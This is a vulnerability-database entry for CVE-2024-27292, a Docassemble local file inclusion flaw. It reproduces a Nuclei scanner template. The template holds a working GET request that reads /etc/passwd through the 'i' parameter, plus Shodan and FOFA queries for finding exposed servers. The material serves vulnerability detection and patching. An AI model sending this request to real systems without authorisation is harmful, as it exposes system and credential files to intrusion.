Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-27292
HistoryJul 01, 2024 - 3:24 p.m.

Docassemble - Local File Inclusion

2024-07-0115:24:38
ProjectDiscovery
github.com
3
cve
cve2024
docassemble
local file inclusion
vulnerability
unauthorized access
url manipulation

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

6.7 Medium

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

21.7%

Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
id: CVE-2024-27292

info:
  name: Docassemble - Local File Inclusion
  author: johnk3r
  severity: high
  description: |
    Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
  reference:
    - https://tantosec.com/blog/docassemble/
    - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
    - https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-27292
    cwe-id: CWE-706
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"docassemble"
    fofa-query: icon_hash="-575790689"
  tags: cve,cve2024,docassemble,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/interview?i=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 501
# digest: 4b0a00483046022100d8b89e9955181d9c42c128bf1113ced63499aabac72a131110385c0d688d14cd022100c3821f365b88c32e60e587c998e270a901c7bf42808ab259453168ca771c16d8:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

6.7 Medium

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

21.7%